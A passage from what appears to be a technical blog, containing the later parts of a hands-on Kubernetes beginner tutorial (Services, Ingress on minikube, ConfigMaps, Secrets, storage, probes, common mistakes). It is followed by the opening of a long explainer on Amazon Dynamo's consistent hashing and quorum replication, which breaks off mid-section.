kubectl rollout undo deployment/my-app

Part 6 — Networking: Services and How Apps Talk to Each Other

The Problem: Pods Are Ephemeral

Pods get new IP addresses every time they're created. Their IPs are only valid inside the cluster network. You can't hardcode Pod IPs — they'll change whenever a Pod restarts or gets rescheduled. This is why Services exist.

Service Types

ClusterIP (default)
Only reachable within the cluster. Used for internal service-to-service communication. Gets a stable virtual IP and a DNS name.

NodePort
Exposes the service on a static port (30000–32767) on every node's IP. Accessible from outside via <NodeIP>:<NodePort>. Useful for local development and testing, but not recommended for production — it exposes a port on every node and bypasses proper load balancing.

LoadBalancer
Provisions an external load balancer from your cloud provider (AWS, GCP, Azure, etc.), giving you a public IP or hostname. This is the standard way to expose public-facing apps in production.

ExternalName
Maps a Service to an external DNS name. Useful for integrating with external services (like a managed database) without hardcoding URLs in your app.

Service YAML

# service.yaml
apiVersion: v1
kind: Service
metadata:
  name: my-app-service
spec:
  selector:
    app: my-app          # Routes traffic to Pods with this label
  ports:
  - protocol: TCP
    port: 80             # Port the Service listens on
    targetPort: 80       # Port on the Pod to forward to
  type: ClusterIP

Exercise 8: Services and Internal DNS

kubectl apply -f service.yaml

# Every Service gets an automatic DNS name inside the cluster:
# Format: <service-name>.<namespace>.svc.cluster.local
# e.g.:   my-app-service.default.svc.cluster.local
# Within the same namespace, just: my-app-service

# Test DNS resolution from inside the cluster
kubectl run tmp-shell --rm -it --image=curlimages/curl -- sh
# Inside the shell:
curl my-app-service
curl my-app-service.default.svc.cluster.local   # fully-qualified form

Ingress: The Smart HTTP Router

For production web traffic, you typically put an Ingress in front of your Services. An Ingress routes HTTP/HTTPS traffic based on rules (hostnames, URL paths).

Critical: An Ingress resource by itself does nothing. It requires an Ingress Controller to be installed in the cluster — a running component that reads Ingress objects and actually configures the routing. Popular controllers include nginx, Traefik, and HAProxy. Without a controller, your Ingress YAML is just ignored.

Exercise 9b: End-to-End Ingress Walkthrough

This exercise builds on the my-app Deployment and my-app-service Service from earlier. By the end you'll hit a real hostname routed through the Ingress controller to your Pods.

Mac users — read this before starting: On Mac, minikube runs inside a VM or Docker container. The minikube IP (e.g. 192.168.49.2) lives inside that VM's private network and is not directly reachable from your Mac. The steps below have a Mac-specific section to handle this. Linux and Windows users can follow the standard path.

Step 1 — Enable the Ingress controller (minikube)

minikube addons enable ingress

# Wait until the controller Pod is Running (takes ~60 seconds)
kubectl get pods -n ingress-nginx --watch
# Look for: ingress-nginx-controller-xxx   Running

Step 2 — Create the Ingress resource

Save the following as ingress.yaml:

# ingress.yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: my-app-ingress
  annotations:
    nginx.ingress.kubernetes.io/rewrite-target: /
spec:
  rules:
  - host: myapp.local
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: my-app-service
            port:
              number: 80

kubectl apply -f ingress.yaml

# Verify the Ingress was created and has an address assigned
kubectl get ingress my-app-ingress

Expected output (ADDRESS populates after ~30 seconds):

NAME             CLASS   HOSTS        ADDRESS        PORTS   AGE
my-app-ingress   nginx   myapp.local  192.168.49.2   80      45s

If ADDRESS is blank after a minute, the Ingress controller isn't running yet — recheck Step 1.

Step 3 — Make the hostname reachable (OS-specific)

This is where Mac and Linux/Windows diverge.

🍎 Mac

On Mac, the minikube IP is not routable from your host. You need minikube tunnel to bridge your Mac's localhost into the cluster.

Open a new terminal window and run:

minikube tunnel

It will prompt for your sudo password (it needs to bind to ports 80 and 443). Leave this terminal open for the entire exercise — closing it stops the tunnel.

✅ Tunnel successfully started
🏃 Starting tunnel for service my-app-ingress.

Now add this line to /etc/hosts (use 127.0.0.1, not the minikube IP):

sudo sh -c 'echo "127.0.0.1   myapp.local" >> /etc/hosts'

🐧 Linux

The minikube IP is directly reachable on Linux. Get it and add it to /etc/hosts:

echo "$(minikube ip)   myapp.local" | sudo tee -a /etc/hosts

🪟 Windows

minikube ip   # note the IP, e.g. 192.168.49.2

Open C:\Windows\System32\drivers\etc\hosts as Administrator in Notepad and add:

192.168.49.2   myapp.local

Step 4 — Verify routing works

# Should return nginx HTML
curl http://myapp.local

# Or open in your browser
open http://myapp.local        # Mac
xdg-open http://myapp.local   # Linux
# Windows: just paste http://myapp.local into a browser

You should see the nginx welcome page served through the Ingress controller.

If you're on Mac and it still times out, confirm the tunnel is still running in its terminal window and that /etc/hosts has 127.0.0.1 (not the minikube IP).

Step 5 — Inspect what Kubernetes created

# Full details of the Ingress, including routing rules and backend
kubectl describe ingress my-app-ingress

Look for the Rules section — it shows exactly which host + path maps to which Service and port.

Step 6 — Confirm the controller is doing the routing (optional deep-dive)

# The Ingress controller is just a Pod — you can see its access logs
kubectl logs -n ingress-nginx \
  $(kubectl get pods -n ingress-nginx -o name | grep controller) \
  --tail=20

You'll see a new access log line appear each time you curl myapp.local.

Step 7 — Clean up

kubectl delete ingress my-app-ingress

# Remove the /etc/hosts entry
# Mac/Linux — remove the line you added:
sudo sed -i '' '/myapp.local/d' /etc/hosts   # Mac
sudo sed -i '/myapp.local/d' /etc/hosts       # Linux

# Mac only — stop the tunnel in its terminal window with Ctrl+C

What you just validated end-to-end:

Why the difference? On Linux, the minikube network is routed directly to your host. On Mac, minikube runs inside a VM whose network is isolated — minikube tunnel creates a temporary route via localhost to bridge that gap.

Part 7 — Configuration and Secrets

Why Not Hardcode Config?

If you bake configuration into your container image, you need a new image for every environment (dev/staging/prod). Kubernetes provides two resources to inject config externally, keeping your images portable.

ConfigMaps

# configmap.yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: app-config
data:
  LOG_LEVEL: "debug"
  APP_ENV: "staging"
  config.json: |
    {
      "timeout": 30,
      "retries": 3
    }

Using a ConfigMap in a Deployment:

spec:
  containers:
  - name: my-app
    image: nginx
    env:
    - name: LOG_LEVEL
      valueFrom:
        configMapKeyRef:
          name: app-config
          key: LOG_LEVEL
    volumeMounts:
    - name: config-volume
      mountPath: /etc/config
  volumes:
  - name: config-volume
    configMap:
      name: app-config

ConfigMap update behavior:

When a ConfigMap is mounted as a volume, the files on disk are updated automatically — but with a delay (typically up to a minute). Importantly, the application must re-read the file to pick up changes. Apps that cache config at startup won't see updates without a restart.
When a ConfigMap is used as an environment variable, the Pod must be restarted to see updated values — env vars are set at container start and do not live-update.

Secrets

Secrets work similarly to ConfigMaps but are intended for sensitive data.

Important security details:

Secrets are stored base64-encoded in etcd. Base64 is encoding, not encryption — anyone with etcd access can decode them trivially.
By default, Secrets are not encrypted at rest in etcd. You can enable encryption at rest in the API server configuration, but it requires explicit setup.
All communication between your app and the API server is over TLS.
Access to Secrets is controlled by RBAC — only authorized service accounts and users can read them.

# secret.yaml
apiVersion: v1
kind: Secret
metadata:
  name: app-secrets
type: Opaque
data:
  DB_PASSWORD: cGFzc3dvcmQxMjM=    # base64 of "password123"
  API_KEY: c3VwZXJzZWNyZXQ=        # base64 of "supersecret"

# Create a secret without manually base64-encoding
kubectl create secret generic app-secrets \
  --from-literal=DB_PASSWORD=password123 \
  --from-literal=API_KEY=supersecret

# Values are hidden in describe output
kubectl get secrets
kubectl describe secret app-secrets

Exercise 9: ConfigMap in Practice

kubectl apply -f configmap.yaml

kubectl get configmap app-config
kubectl describe configmap app-config

# Edit the ConfigMap live
kubectl edit configmap app-config
# (Volume-mounted Pods will pick up the change after a short delay;
#  env-var Pods will NOT until they restart)

Production secret management: For real workloads, look into HashiCorp Vault, Sealed Secrets, or External Secrets Operator — these provide proper secret lifecycle management, rotation, and audit trails.

Part 8 — Storage: Keeping Data Alive

The Ephemeral Problem

When a Pod dies, everything written to its container filesystem is gone. For stateless apps (web servers, APIs), that's fine. For databases, that's catastrophic.

Storage Concepts

Volume
Tied to a Pod's lifecycle. Shared between containers in a Pod. Types include emptyDir (temporary scratch space), hostPath (mounts a directory from the node), and many others. Disappears with the Pod for ephemeral types.

PersistentVolume (PV)
A piece of storage provisioned in the cluster — either manually by an admin or automatically (dynamically). Lives independently of any Pod.

PersistentVolumeClaim (PVC)
A user's request for storage. Specifies size, access mode, and optionally a StorageClass. Kubernetes binds a PVC to a matching PV.

StorageClass
Defines the type and provisioner of storage (e.g., SSD vs HDD, local vs cloud block storage). Enables dynamic provisioning — when you create a PVC, the StorageClass automatically creates a PV to satisfy it.

PVC Example

# pvc.yaml
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: my-data
spec:
  accessModes:
    - ReadWriteOnce           # One node can read/write at a time
  resources:
    requests:
      storage: 1Gi
  # No storageClassName specified = uses the cluster default
  # Check available classes with: kubectl get storageclass

# Use PVC in a Pod
spec:
  containers:
  - name: my-db
    image: postgres:15
    volumeMounts:
    - mountPath: "/var/lib/postgresql/data"
      name: db-storage
  volumes:
  - name: db-storage
    persistentVolumeClaim:
      claimName: my-data

Exercise 10: PVC with minikube

# Check what StorageClasses are available in your cluster
kubectl get storageclass

# Create the PVC
kubectl apply -f pvc.yaml

# Verify it bound to a PV
kubectl get pvc
# STATUS should be: Bound

StatefulSets: For Databases and Stateful Apps

For databases and other stateful applications, use a StatefulSet instead of a Deployment. StatefulSets provide guarantees that Deployments don't:

Stable, unique Pod names (pod-0, pod-1, pod-2 — never random suffixes)
Stable network identities (each Pod gets its own DNS hostname)
Ordered, graceful startup and shutdown (pod-0 before pod-1, etc.)

This is critical for clustered databases like PostgreSQL, Cassandra, or Kafka, where each node has a distinct role and identity.

Part 9 — Observability: Knowing What's Going On

The Three Pillars of Observability

Kubernetes provides primitives for all three, but a full observability stack requires additional tooling.

Logs

# Basic logs
kubectl logs <pod-name>

# Follow logs in real time
kubectl logs -f <pod-name>

# Logs from a specific container in a multi-container Pod
kubectl logs <pod-name> -c <container-name>

# Logs from the previous (crashed) container instance
kubectl logs <pod-name> --previous

# Logs from all pods matching a label (requires kubectl 1.14+)
kubectl logs -l app=my-app --all-containers=true

Events

Events are Kubernetes's audit trail — they record what happened to resources and are invaluable for debugging:

# All recent events, sorted by time
kubectl get events --sort-by=.metadata.creationTimestamp

# Events for a specific resource (look at the Events section at the bottom)
kubectl describe pod <pod-name>
kubectl describe deployment my-app

Health Checks (Probes)

Kubernetes has three built-in health check mechanisms. Configuring these correctly is one of the most impactful things you can do for reliability:

Liveness Probe — Is the container alive? If it fails, kubelet restarts the container.

Readiness Probe — Is the container ready to receive traffic? If it fails, the Pod is removed from Service endpoints (traffic stops going to it) but it is not restarted.

Startup Probe — For slow-starting apps. Disables liveness and readiness checks until the startup probe succeeds, giving the app time to initialize.

spec:
  containers:
  - name: my-app
    image: nginx
    startupProbe:
      httpGet:
        path: /healthz
        port: 80
      failureThreshold: 30     # Give up to 30 * 10s = 5 minutes to start
      periodSeconds: 10
    livenessProbe:
      httpGet:
        path: /healthz
        port: 80
      initialDelaySeconds: 10
      periodSeconds: 5
    readinessProbe:
      httpGet:
        path: /ready
        port: 80
      initialDelaySeconds: 5
      periodSeconds: 3

Resource Metrics

# Enable metrics-server (minikube only)
minikube addons enable metrics-server

# View CPU and memory usage
kubectl top nodes
kubectl top pods
kubectl top pods --sort-by=memory   # Sort by memory usage

Popular Observability Tools

Tool	Purpose	Link
Prometheus	Metrics collection and alerting rules	prometheus.io
Grafana	Dashboards and visualization	grafana.com
Loki	Log aggregation (Grafana's log tool)	grafana.com/oss/loki
Jaeger	Distributed tracing	jaegertracing.io
k9s	Terminal UI for Kubernetes	k9scli.io
Lens	Desktop GUI for Kubernetes	k8slens.dev

💡 Start with k9s immediately. It's a terminal dashboard that makes navigating pods, logs, and events dramatically faster than typing raw kubectl commands. Install it and never look back.

Part 10 — Putting It All Together: The Big Picture

A Real-World Application Architecture

Let's see how all the pieces interact in a typical production-style web application:

The Kubernetes Development Workflow

Key Concepts Recap

What We Haven't Covered (But You Should Know Exists)

Helm — The package manager for Kubernetes. Instead of managing raw YAML, Helm lets you install pre-packaged applications called charts with version management and templating. helm.sh

RBAC (Role-Based Access Control) — Controls who (users, service accounts) can do what (get, create, delete) on which resources. Essential for multi-team clusters.

NetworkPolicy — Firewall rules for Pod-to-Pod communication. By default all Pods can talk to each other; NetworkPolicies let you restrict this.

DaemonSet — Ensures a Pod runs on every node in the cluster. Used for node-level tools like log collectors, monitoring agents, and network plugins.

Job / CronJob — Run one-off or scheduled tasks. A Job runs to completion; a CronJob runs on a schedule (like cron).

Horizontal Pod Autoscaler (HPA) — Automatically scales a Deployment's replica count based on CPU/memory metrics or custom metrics.

Operators — Custom controllers that encode operational knowledge about complex applications (e.g., how to set up a Postgres cluster, handle failover, run backups). operatorhub.io

Service Mesh (Istio, Linkerd) — Infrastructure layer for advanced traffic management, mutual TLS between services, and deep observability without touching app code.

Pod Disruption Budgets (PDB) — Guarantee a minimum number of Pods stay up during voluntary disruptions (like node maintenance).

Managed Kubernetes: Running in Production

In production, most teams use a managed Kubernetes service where the cloud provider operates the control plane for you:

Provider	Service
AWS	EKS (Elastic Kubernetes Service)
Google Cloud	GKE (Google Kubernetes Engine)
Azure	AKS (Azure Kubernetes Service)
DigitalOcean	DOKS
Hetzner (budget option)	Hetzner K8s

Where to Go Next

Resource	Link
Official Kubernetes Docs	kubernetes.io/docs
Interactive Tutorial (browser, no setup needed)	kubernetes.io/docs/tutorials
KodeKloud (video + interactive labs)	kodekloud.com
CNCF Landscape (ecosystem map)	landscape.cncf.io
Kubernetes the Hard Way	github.com/kelseyhightower
Play with Kubernetes (browser-based cluster)	labs.play-with-k8s.com
CKA Exam (Certified Kubernetes Administrator)	cncf.io/training/certification/#cka

Final Exercise: Deploy a Multi-Tier App

Try deploying a simple app with a frontend and a backend. Here's your challenge:

Create a Namespace called my-project
Deploy nginx as your "frontend" with 2 replicas in that namespace
Deploy kennethreitz/httpbin as your "backend" with 2 replicas
Create ClusterIP Services for both
Enable the nginx Ingress controller and create an Ingress that routes / to frontend and /api to backend
Add a ConfigMap with a custom environment variable and reference it in the backend Deployment
Set resource requests and limits on both Deployments
Add a readiness probe to both Deployments
Scale the frontend to 4 replicas
Trigger a rolling update on the frontend (change image to nginx:alpine)
Roll it back

This covers: Namespaces, Deployments, Services, Ingress, ConfigMaps, Resource Management, Health Probes, Scaling, Rolling Updates, and Rollbacks — everything from this series!

Appendix — Common Beginner Mistakes

These mistakes are extremely common. Knowing them in advance will save you hours of debugging.

1. Hardcoding Pod IPs

Mistake: Connecting to a Pod by its IP address directly.
Why it breaks: Pod IPs change every time a Pod is rescheduled or restarted.
Fix: Always use a Service name. Use DNS: http://my-service or http://my-service.my-namespace.

2. Using NodePort in Production

Mistake: Exposing apps via NodePort for production traffic.
Why it's wrong: It opens a port on every node, bypasses cloud load balancer health checks, and doesn't scale well.
Fix: Use LoadBalancer Services or an Ingress with a LoadBalancer-type controller.

3. Not Setting Resource Requests

Mistake: Deploying Pods with no resources.requests defined.
Why it breaks: The scheduler has no data to place Pods correctly. Nodes can become overloaded, causing unpredictable OOMKills and CPU starvation across the cluster.
Fix: Always set both requests and limits. Start conservative and tune based on observed usage.

4. Running Databases in Deployments

Mistake: Using a Deployment for stateful apps like PostgreSQL or MySQL.
Why it breaks: Deployments don't guarantee stable Pod names, stable network identity, or ordered startup/shutdown — all of which clustered databases depend on.
Fix: Use StatefulSets for any stateful workload that requires identity or ordered operations.

5. Not Setting Readiness Probes

Mistake: Deploying apps with no readiness probe.
Why it breaks: Kubernetes sends traffic to a Pod the moment the container starts — even before your app has finished initializing. Users hit errors during startup and rolling updates.
Fix: Add a readiness probe that checks your app's actual health endpoint before traffic is sent to it.

6. Storing Secrets in Git or ConfigMaps

Mistake: Committing Secret YAML with real values to source control, or storing passwords in ConfigMaps.
Why it breaks: Secrets in git are compromised forever. ConfigMaps have no access controls.
Fix: Use kubectl create secret from CI/CD pipelines, or a secrets management tool like Vault or Sealed Secrets.

7. Using `latest` Image Tags

Mistake: Deploying with image: myapp:latest.
Why it breaks: latest is mutable — the same tag can point to different images over time, making rollbacks unreliable and deployments non-deterministic.
Fix: Always use immutable, specific version tags like myapp:v1.4.2 or myapp:sha-abc1234.

8. Ignoring the Events Section

Mistake: Only looking at Pod status (Running, CrashLoopBackOff) and not reading events.
Why it slows you down: Events are where Kubernetes tells you why something failed — image pull errors, OOMKills, failed scheduling, volume mount failures.
Fix: Always run kubectl describe pod <name> and read the Events section at the bottom first when debugging.

Happy orchestrating! 🚢

NotebookLM Link

Originally published at https://platformwale.blog

Understanding Amazon Dynamo: A Deep Dive into Distributed System Design

Piyush Jajoo — Sat, 21 Feb 2026 04:01:05 +0000

A senior engineer's perspective on building highly available distributed systems

Introduction: Why Dynamo Changed Everything
The CAP Theorem Trade-off
Core Architecture Components
- Consistent Hashing for Partitioning
- Replication Strategy (N, R, W)
- Vector Clocks for Versioning
- Sloppy Quorum and Hinted Handoff
Conflict Resolution: The Shopping Cart Problem
Read and Write Flow
Merkle Trees for Anti-Entropy
Membership and Failure Detection
Performance Characteristics: Real Numbers
Partitioning Strategy Evolution
Comparing Dynamo to Modern Systems
What Dynamo Does NOT Give You
Practical Implementation Example
Key Lessons for System Design
When NOT to Use Dynamo-Style Systems
Conclusion
Appendix: Design Problems and Approaches

This is a long-form reference — every section stands on its own, so feel free to jump directly to whatever is most relevant to you.

Introduction: Why Dynamo Changed Everything

When Amazon published the Dynamo paper in 2007, it wasn't just another academic exercise. It was a battle-tested solution to real problems at massive scale. I remember when I first read this paper—it fundamentally changed how I thought about distributed systems.

Dynamo is a distributed key-value storage system. It was designed to support Amazon’s high-traffic services such as the shopping cart and session management systems. There are no secondary indexes, no joins, no relational semantics—just keys and values, with extreme focus on availability and scalability. It does not provide linearizability or global ordering guarantees, even at the highest quorum settings. If your system requires those properties, Dynamo is not the right tool.

The core problem Amazon faced was simple to state but brutal to solve: How do you build a storage system that never says "no" to customers? When someone tries to add an item to their shopping cart during a network partition or server failure, rejecting that write isn't acceptable. Every lost write is lost revenue and damaged customer trust.

The CAP Theorem Trade-off: Why Dynamo Chooses Availability

Before diving into how Dynamo works, you need to understand the fundamental constraint it's designed around.

What is CAP Theorem?

The CAP theorem describes a fundamental trade-off in distributed systems: when a network partition occurs, you must choose between consistency and availability. The three properties are:

Consistency (C): All nodes see the same data at the same time
Availability (A): Every request gets a response (success or failure)
Partition Tolerance (P): System continues working despite network failures

A common shorthand is "pick 2 of 3," but this is an oversimplification. In practice, network partitions are unavoidable at scale, so the real decision is: when partitions occur (and they will), do you sacrifice consistency or availability? That's the actual design choice.

The harsh reality: Network partitions WILL happen. Cables get cut, switches fail, datacenters lose connectivity. You can't avoid them, so you must choose: Consistency or Availability?

Traditional Databases Choose Consistency

Traditional approach:

Database: "I can't guarantee all replicas are consistent,
           so I'll reject your write to be safe."
Result: Customer sees error, cart is empty
Impact: Lost revenue, poor experience

Dynamo Chooses Availability

Dynamo's approach:

Dynamo: "I'll accept your write with the replicas I can reach.
         The unreachable replica will catch up later."
Result: Customer sees success, item in cart
Impact: Sale continues, happy customer

The Trade-off Visualized

When a partition occurs:

Traditional Database: Choose C over A → Sacrifice Availability
- ✓ All replicas always have same data
- ✓ No conflicts to resolve
- ❌ Rejects writes during failures
- ❌ Poor customer experience
- ❌ Lost revenue

Dynamo:              Choose A over C → Sacrifice Strong Consistency
- ✓ Accepts writes even during failures
- ✓ Excellent customer experience
- ✓ No lost revenue
- ❌ Replicas might temporarily disagree
- ❌ Application must handle conflicts

Real Amazon Example: Black Friday Shopping Cart

Imagine it's Black Friday. Millions of customers are shopping. A network cable gets cut between datacenters.

With traditional database:

Time: 10:00 AM - Network partition occurs
Result: 
- All shopping cart writes fail
- "Service Unavailable" errors
- Customers can't checkout
- Twitter explodes with complaints
- Estimated lost revenue: $100,000+ per minute

With Dynamo:

Time: 10:00 AM - Network partition occurs
Result:
- Shopping cart writes continue
- Customers see success
- Some carts might have conflicts (rare)
- Application merges conflicting versions
- Estimated lost revenue: $0
- A few edge cases need conflict resolution (acceptable)

Why This Choice Makes Sense for E-commerce

Amazon did the math:

Cost of rejecting a write: Immediate lost sale ($50-200)
Cost of accepting a conflicting write: Occasionally need to merge shopping carts (rarely happens, easily fixable)
Business decision: Accept writes, deal with rare conflicts

Types of data where Availability > Consistency:

Shopping carts (merge conflicting additions)
Session data (last-write-wins is fine)
User preferences (eventual consistency acceptable)
Best seller lists (approximate is fine)

Types of data where Consistency > Availability:

Bank account balances (can't have conflicting balances)
Inventory counts (can't oversell)
Transaction logs (must be ordered)

This is why Dynamo isn't for everything—but for Amazon's e-commerce use cases, choosing availability over strong consistency was the right trade-off.

Important nuance: While Dynamo is often described as an AP system, it's more accurate to call it a tunable consistency system. Depending on your R and W quorum configuration, it can behave closer to CP. The AP label applies to its default/recommended configuration optimized for e-commerce workloads.

Core Architecture Components

1. Consistent Hashing for Partitioning

Let me explain this with a concrete example, because consistent hashing is one of those concepts that seems magical until you see it in action.

The Problem: Traditional Hash-Based Sharding

Imagine you have 3 servers and want to distribute data across them. The naive approach:

# Traditional approach - DON'T DO THIS
def get_server(key, num_servers):
    hash_value = hash(key)
    return hash_value % num_servers  # Modulo operation

# With 3 servers:
get_server("user_123", 3)  # Returns server 0
get_server("user_456", 3)  # Returns server 1
get_server("user_789", 3)  # Returns server 2

This works... until you add or remove a server. Let's see what happens when we go from 3 to 4 servers:

# Before (3 servers):
"user_123" → hash % 3 = 0 → Server 0
"user_456" → hash % 3 = 1 → Server 1
"user_789" → hash % 3 = 2 → Server 2

# After (4 servers):
"user_123" → hash % 4 = 0 → Server 0 ✓ (stayed)
"user_456" → hash % 4 = 1 → Server 1 ✓ (stayed)
"user_789" → hash % 4 = 2 → Server 2 ✓ (stayed)

# But wait - this is lucky! In reality, most keys MOVE:
"product_ABC" → hash % 3 = 2 → Server 2
"product_ABC" → hash % 4 = 3 → Server 3 ✗ (MOVED!)

The disaster: When you change the number of servers, nearly ALL your data needs to be redistributed. Imagine moving terabytes of data just to add one server!

The Solution: Consistent Hashing

Consistent hashing solves this by treating the hash space as a circle (0 to 2^32 - 1, wrapping around).

Step 1: Place servers on the ring

Each server is assigned a random position on the ring (called a "token"). Think of this like placing markers on a circular racetrack.

Step 2: Place data on the ring

When you want to store data, you:

Hash the key to get a position on the ring
Walk clockwise from that position
Store the data on the first server you encounter

Visual Example: Complete Ring

Here's the ring laid out in order. Keys walk clockwise to the next server:

Simple rule: A key walks clockwise until it hits a server. That server owns the key.

Examples:

user_123 at 30° → walks to 45° → Server A owns it
user_456 at 150° → walks to 200° → Server C owns it
cart_789 at 250° → walks to 280° → Server D owns it
product_ABC at 300° → walks past 360°, wraps to 0°, continues to 45° → Server A owns it

Who owns what range?

Server A (45°): owns everything from 281° to 45° (wraps around)
Server B (120°): owns everything from 46° to 120°
Server C (200°): owns everything from 121° to 200°
Server D (280°): owns everything from 201° to 280°

The Magic: Adding a Server

Now let's see why this is brilliant. We add Server E at position 160°:

BEFORE:
Server A (45°)  → owns 281°-45°
Server B (120°) → owns 46°-120°
Server C (200°) → owns 121°-200°  ← THIS RANGE WILL SPLIT
Server D (280°) → owns 201°-280°

AFTER:
Server A (45°)  → owns 281°-45°   ← NO CHANGE
Server B (120°) → owns 46°-120°   ← NO CHANGE
Server E (160°) → owns 121°-160°  ← NEW! Takes part of C's range
Server C (200°) → owns 161°-200°  ← SMALLER range
Server D (280°) → owns 201°-280°  ← NO CHANGE

Result: Only keys in range 121°-160° need to move (from C to E). Servers A, B, and D are completely unaffected!

The Virtual Nodes Optimization

There's a critical problem with the basic consistent hashing approach: random distribution can be extremely uneven.

The Problem in Detail:

When you randomly assign one position per server, you're essentially throwing darts at a circular board. Sometimes the darts cluster together, sometimes they spread out. This creates hotspots.

Let me show you a concrete example:

Scenario: 4 servers with single random tokens

Server A: 10°   }
Server B: 25°   } ← Only 75° apart! Tiny ranges
Server C: 100°  }

Server D: 280°  ← 180° away from C! Huge range

Range sizes:
- Server A owns: 281° to 10° = 89° (25% of ring)
- Server B owns: 11° to 25° = 14° (4% of ring)  ← Underutilized!
- Server C owns: 26° to 100° = 74° (21% of ring)
- Server D owns: 101° to 280° = 179° (50% of ring)  ← Overloaded!

Real-world consequences:

Uneven load: Server D handles 50% of all data while Server B handles only 4%. This means:
- Server D's CPU, disk, and network are maxed out
- Server B is mostly idle (wasted capacity)
- Your 99.9th percentile latency is dominated by Server D being overloaded
Hotspot cascading: When Server D becomes slow or fails:
- All its 50% load shifts to Server A (the next one clockwise)
- Server A now becomes overloaded
- System performance degrades catastrophically
Inefficient scaling: Adding servers doesn't help evenly because new servers might land in already small ranges

Visualizing the problem:

Dynamo's solution: Each physical server gets multiple virtual positions (tokens).

Instead of one dart throw per server, throw many darts. The more throws, the more even the distribution becomes (law of large numbers).

How Virtual Nodes Fix the Problem:

Let's take the same 4 servers, but now each server gets 3 virtual nodes (tokens) instead of 1:

Physical Server A gets 3 tokens: 10°, 95°, 270°
Physical Server B gets 3 tokens: 25°, 180°, 310°
Physical Server C gets 3 tokens: 55°, 150°, 320°
Physical Server D gets 3 tokens: 75°, 200°, 340°

Now the ring looks like:
10° A, 25° B, 55° C, 75° D, 95° A, 150° C, 180° B, 200° D, 270° A, 310° B, 320° C, 340° D

Range sizes (approximately):
- Server A total: 15° + 55° + 40° = 110° (31% of ring)
- Server B total: 30° + 20° + 30° = 80° (22% of ring)
- Server C total: 20° + 30° + 20° = 70° (19% of ring)
- Server D total: 20° + 70° + 20° = 110° (31% of ring)

Much better! Load ranges from 19% to 31% instead of 4% to 50%.

Why this works:

Statistics: With more samples (tokens), the random distribution averages out. This is the law of large numbers in action.
Granular load distribution: When a server fails, its load is distributed across many servers, not just one neighbor:

   Server A fails:
   - Its token at 10° → load shifts to Server B's token at 25°
   - Its token at 95° → load shifts to Server C's token at 150°
   - Its token at 270° → load shifts to Server B's token at 310°

   Result: The load is spread across multiple servers!

Smooth scaling: When adding a new server with 3 tokens, it steals small amounts from many servers instead of a huge chunk from one server.

Real Dynamo configurations:

The paper mentions different strategies evolved over time. In production:

Early versions: 100-200 virtual nodes per physical server
Later optimized to: Q/S tokens per node (where Q = total partitions, S = number of servers)
Typical setup: Each physical server might have 128-256 virtual nodes

The Trade-off: Balance vs Overhead

More virtual nodes means better load distribution, but there's a cost.

What you gain with more virtual nodes:

With 1 token per server (4 servers):
Load variance: 4% to 50% (±46% difference) ❌

With 3 tokens per server (12 virtual nodes):
Load variance: 19% to 31% (±12% difference) ✓

With 128 tokens per server (512 virtual nodes):
Load variance: 24% to 26% (±2% difference) ✓✓

What it costs:

Metadata size: Each node maintains routing information
- 1 token per server: Track 4 entries
- 128 tokens per server: Track 512 entries
Gossip overhead: Nodes exchange membership info periodically
- More tokens = more data to sync between nodes
- Every second, nodes gossip their view of the ring
Rebalancing complexity: When nodes join/leave
- More virtual nodes = more partition transfers to coordinate
- But each transfer is smaller (which is actually good for bootstrapping)

Dynamo's evolution:

The paper describes how Amazon optimized this over time:

Strategy 1 (Initial):
- 100-200 random tokens per server
- Problem: Huge metadata (multiple MB per node)
- Problem: Slow bootstrapping (had to scan for specific key ranges)

Strategy 3 (Current):
- Q/S tokens per server (Q=total partitions, S=number of servers)
- Equal-sized partitions
- Example: 1024 partitions / 8 servers = 128 tokens per server
- Benefit: Metadata reduced to KB
- Benefit: Fast bootstrapping (transfer whole partition files)

Real production sweet spot:

Most Dynamo deployments use 128-256 virtual nodes per physical server. This achieves:

Load distribution within 10-15% variance (good enough)
Metadata overhead under 100KB per node (negligible)
Fast failure recovery (load spreads across many nodes)

Why not more? Diminishing returns. Going from 128 to 512 tokens only improves load balance by 2-3%, but doubles metadata size and gossip traffic.

Key concept: Physical servers (top) map to multiple virtual positions (bottom) on the ring. This distributes each server's load across different parts of the hash space.

Benefits:

More even load distribution
When a server fails, its load is distributed across many servers (not just one neighbor)
When a server joins, it steals a small amount from many servers

Real-World Impact Comparison

Let's see the difference with real numbers:

Traditional Hashing (3 servers → 4 servers):
- Keys that need to move: ~75% (3 out of 4)
- Example: 1 million keys → 750,000 keys must migrate

Consistent Hashing (3 servers → 4 servers):
- Keys that need to move: ~25% (1 out of 4)
- Example: 1 million keys → 250,000 keys must migrate

With Virtual Nodes (150 vnodes total → 200 vnodes):
- Keys that need to move: ~12.5% (spread evenly)
- Example: 1 million keys → 125,000 keys must migrate
- Load is balanced across all servers

The "Aha!" Moment

The key insight is this: Consistent hashing decouples the hash space from the number of servers.

Traditional: server = hash(key) % num_servers ← num_servers is in the formula!
Consistent: server = ring.findNextClockwise(hash(key)) ← num_servers isn't in the formula!

This is why adding/removing servers only affects a small portion of the data. The hash values don't change—only which server "owns" which range changes, and only locally.

Think of it like a circular running track with water stations (servers). If you add a new water station, runners only change stations if they're between the old nearest station and the new one. Everyone else keeps going to their same station.

2. Replication Strategy (N, R, W)

The Problem: Availability vs Consistency Trade-off

Imagine you're building Amazon's shopping cart. A customer adds an item to their cart, but at that exact moment:

One server is being rebooted for maintenance
Another server has a network hiccup
A third server is perfectly fine

Traditional database approach (strong consistency):

Client: "Add this item to my cart"
Database: "I need ALL replicas to confirm before I say yes"
Server 1: ✗ (rebooting)
Server 2: ✗ (network issue)
Server 3: ✓ (healthy)

Result: "Sorry, service unavailable. Try again later."

Customer experience: 😡 "I can't add items to my cart during Black Friday?!"

This is unacceptable for e-commerce. Every rejected write is lost revenue.

Dynamo's Solution: Tunable Quorums

Dynamo gives you three knobs to tune the exact trade-off you want:

N: Number of replicas (how many copies of the data)
R: Read quorum (how many replicas must respond for a successful read)
W: Write quorum (how many replicas must acknowledge for a successful write)

The magic formula: When R + W > N, you guarantee quorum overlap—meaning at least one node that received the write will be queried during any read. This overlap enables detection of the latest version, provided the reconciliation logic correctly identifies the highest vector clock. It does not automatically guarantee read-your-writes unless the coordinator properly resolves versions.

Let me show you why this matters with real scenarios:

Scenario 1: Shopping Cart (Prioritize Availability)

